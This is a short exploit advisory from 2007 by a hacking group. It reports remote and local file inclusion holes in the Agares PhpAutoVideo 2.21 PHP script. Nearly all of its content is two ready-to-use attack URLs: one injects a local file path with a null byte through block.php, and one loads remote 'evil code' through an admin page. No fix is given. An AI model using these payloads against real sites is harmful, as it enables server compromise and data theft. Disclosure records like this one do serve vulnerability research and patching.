Agares PhpAutoVideo 2.21 Remote-Local File Inclusion Vulnerabilities

2007-12-24 00:00:00

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Remote File Inclusion + Local File Inclusion

---------------------------------------------------------------

# Author: MhZ91
# Title: Agares PhpAutoVideo v2.21 - Remote File Inclusion + Local File Inclusion
# Download: http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# Bug: Remote File Inclusion + Local File Inclusion
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

Local File Inclusion:

http://[site]/includes/block.php?selected_provider=[LFI]%00

---------------------------------------------------------------

Remote File Inclusion

http://[site]/admin/frontpage_right.php?loadadminpage=[Evil_Code]

---------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.